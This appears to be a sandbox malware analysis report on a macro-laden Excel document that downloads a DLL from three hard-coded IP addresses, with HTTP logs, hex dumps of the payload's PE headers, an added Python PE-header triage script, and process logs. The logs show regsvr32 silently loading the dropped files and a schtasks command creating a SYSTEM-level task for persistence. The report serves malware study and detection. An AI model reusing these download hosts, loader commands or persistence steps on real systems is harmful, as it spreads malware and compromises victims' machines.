      Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
      Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/f
      File Type:data
      Stream Size:226
      Entropy:3.01175231218
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 ) . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
      Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/o
      File Type:data
      Stream Size:272
      Entropy:3.6318384866
      Base64 Encoded:True
      Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 8 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 8 3 . 9 6 . 6 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 2 5 0 . 1 4 8 . 2 1 3 / . . . . . . . . . . . . . 5 . . . . . . .
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4332
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:4332
      Entropy:4.42025024054
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2461
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
      File Type:data
      Stream Size:2461
      Entropy:3.4974013905
      Base64 Encoded:False
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
      File Type:data
      Stream Size:138
      Entropy:1.48462480805
      Base64 Encoded:False
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
      File Type:data
      Stream Size:264
      Entropy:1.9985725068
      Base64 Encoded:False
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
      File Type:data
      Stream Size:256
      Entropy:1.80540314317
      Base64 Encoded:False
      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1047
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/dir
      File Type:data
      Stream Size:1047
      Entropy:6.66117755603
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . H c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D

      Network Behavior

      Network Port Distribution

      TCP Packets


      HTTP Request Dependency Graph

      • 190.14.37.178
      • 185.183.96.67
      • 185.250.148.213

      HTTP Packets

      Session ID: 0   Source IP: 192.168.2.22   Source Port: 49165   Destination IP: 190.14.37.178   Destination Port: 80   Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Timestamp: Sep 27, 2021 16:51:08.173515081 CEST   kBytes transferred: 0   Direction: OUT
      GET /44466.7022844907.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 190.14.37.178
      Connection: Keep-Alive
      Timestamp: Sep 27, 2021 16:51:09.180974007 CEST   kBytes transferred: 1   Direction: IN
      HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 14:51:09 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7022844907.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 
00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP


      Session ID: 1   Source IP: 192.168.2.22   Source Port: 49166   Destination IP: 185.183.96.67   Destination Port: 80   Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Timestamp: Sep 27, 2021 16:51:11.602025032 CEST   kBytes transferred: 407   Direction: OUT
      GET /44466.7022844907.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 185.183.96.67
      Connection: Keep-Alive
      Timestamp: Sep 27, 2021 16:51:11.850470066 CEST   kBytes transferred: 409   Direction: IN
      HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 14:51:11 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7022844907.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 
00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP


      Session ID: 2   Source IP: 192.168.2.22   Source Port: 49167   Destination IP: 185.250.148.213   Destination Port: 80   Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Timestamp: Sep 27, 2021 16:51:12.323935032 CEST   kBytes transferred: 817   Direction: OUT
      GET /44466.7022844907.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 185.250.148.213
      Connection: Keep-Alive
      Timestamp: Sep 27, 2021 16:51:12.594134092 CEST   kBytes transferred: 819   Direction: IN
      HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 14:51:12 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7022844907.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 
00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP
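
      The three responses above are byte-for-byte the same object (same Content-Length, same PE header bytes, same Content-Disposition), which is the Excel 4.0 macro walking three download hosts for one payload. What follows is an added example, not part of the report: it parses the first 0x2e0 bytes of the session 0 Data Raw dump with nothing beyond the Python standard library and reproduces the checks behind the "PE file has nameless sections" and "PE file contains sections with non-standard names" signatures listed in the overview. The byte string is copied from the dump above; the set of section names treated as ordinary and the Content-Length comparison are the example's own choices.

```python
import struct
from datetime import datetime, timezone

# First 0x2e0 bytes of the session 0 response body, copied from the Data Raw dump in the
# report (not constructed): DOS header, PE signature, COFF and optional headers and all nine
# section headers. The dump stops there, so no section contents are available.
PAYLOAD_HEAD = bytes.fromhex("""
4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 80000000
0e1fba0e 00b409cd 21b8014c cd215468 69732070 726f6772 616d2063 616e6e6f
74206265 2072756e 20696e20 444f5320 6d6f6465 2e0d0d0a 24000000 00000000
50450000 4c010900 858c3b61 00000000 00000000 e0000221 0b010301 000a0300
00f60100 00000000 00100000 00100000 00200300 00000010 00100000 00020000
04000000 00000000 04000000 00000000 00200600 00040000 00000000 02000000
00001000 00100000 00001000 00100000 00000000 10000000 00200300 70000000
c8100400 7c010000 00200400 f40b0100 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00100400 c8000000
00000000 00000000 00000000 00000000 00000000 00000000 2e746578 74000000
0c090300 00100000 000a0300 00040000 00000000 00000000 00000000 20000060
2e656461 74610000 70000000 00200300 00020000 000e0300 00000000 00000000
00000000 40000040 2e646174 61000000 00200000 00300300 00140000 00100300
00000000 00000000 00000000 400000c0 2e646174 61000000 54bf0000 00500300
00c00000 00240300 00000000 00000000 00000000 400000c0 2e726461 74617400
48060000 00100400 00080000 00e40300 00000000 00000000 00000000 400000c0
2e727372 63000000 f40b0100 00200400 000c0100 00ec0300 00000000 00000000
00000000 40000040 00000000 00000000 00500000 00300500 00500000 00f80400
00000000 00000000 00000000 000000c0 00000000 00000000 00500000 00800500
00500000 00480500 00000000 00000000 00000000 000000c0 00000000 00000000
00500000 00d00500 00500000 00980500 00000000 00000000 00000000 000000c0
""")

IMAGE_FILE_DLL = 0x2000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Names an ordinary compiler/linker build emits (assumption of this example); anything else gets flagged.
COMMON_SECTION_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                        ".reloc", ".bss", ".tls", ".pdata", ".CRT"}


def parse_pe_headers(data):
    """Walk DOS, COFF, optional and section headers of a (possibly truncated) PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsections, timestamp, _, _, opt_size, flags = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:                                   # PE32: 32-bit ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:                                                # PE32+: 64-bit ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        if off + 40 > len(data):                         # dump cut off before this header
            break
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "rawsize": rawsize,
                         "rawptr": rawptr, "characteristics": chars})
    return {"machine": machine, "number_of_sections": nsections, "timestamp": timestamp,
            "is_dll": bool(flags & IMAGE_FILE_DLL), "entry_point": entry,
            "image_base": image_base, "size_of_image": size_of_image, "sections": sections}


def expected_file_size(info):
    """Highest raw end offset; equal to the download size means complete file, no overlay."""
    return max(s["rawptr"] + s["rawsize"] for s in info["sections"])


def triage_sections(info):
    """The checks behind the report's nameless / non-standard section name signatures."""
    findings, seen = [], set()
    for s in info["sections"]:
        name, chars = s["name"], s["characteristics"]
        if name == "":
            findings.append(f"nameless section at RVA {s['va']:#x}, {s['rawsize']:#x} raw bytes, "
                            f"characteristics {chars:#010x}")
        elif name not in COMMON_SECTION_NAMES:
            findings.append(f"non-standard section name {name!r}")
        if name and name in seen:
            findings.append(f"duplicate section name {name!r}")
        seen.add(name)
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"writable and executable section {name!r}")
    return findings


if __name__ == "__main__":
    info = parse_pe_headers(PAYLOAD_HEAD)
    built = datetime.fromtimestamp(info["timestamp"], timezone.utc)
    print(f"machine {info['machine']:#x} DLL={info['is_dll']} sections={info['number_of_sections']} "
          f"image_base={info['image_base']:#x} linked {built:%Y-%m-%d %H:%M:%S} UTC")
    for s in info["sections"]:
        print(f"  {s['name'] or '<none>':8} VA {s['va']:#08x} raw {s['rawptr']:#07x}+{s['rawsize']:#x} "
              f"chars {s['characteristics']:#010x}")
    print("raw image ends at", expected_file_size(info), "bytes; Content-Length above is 387072")
    for finding in triage_sections(info):
        print("  !", finding)
```

      What the headers alone give away: Characteristics 0x2102 has IMAGE_FILE_DLL set, so the payload is a DLL, which is why the next stage loads it through regsvr32 rather than executing it; the three trailing nameless sections are read/write only (0xc0000000, no CNT_CODE) and are the kind of region a packer stub fills at run time; and the highest raw end offset, 0x5e800 = 387072, is exactly the Content-Length in all three responses, so the body arrived complete and carries no appended overlay.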


      Code Manipulations

      Statistics

      Behavior


      System Behavior

      General

      Start time:16:51:13
      Start date:27/09/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13ffe0000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:16:51:23
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd.red
      Imagebase:0xffb80000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:16:51:23
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Drezd.red
      Imagebase:0x90000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:16:51:25
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xab0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:16:51:26
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd1.red
      Imagebase:0xffb80000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:16:51:26
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\schtasks.exe
      Wow64 process (32bit):true
      Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05
      Imagebase:0xb60000
      File size:179712 bytes
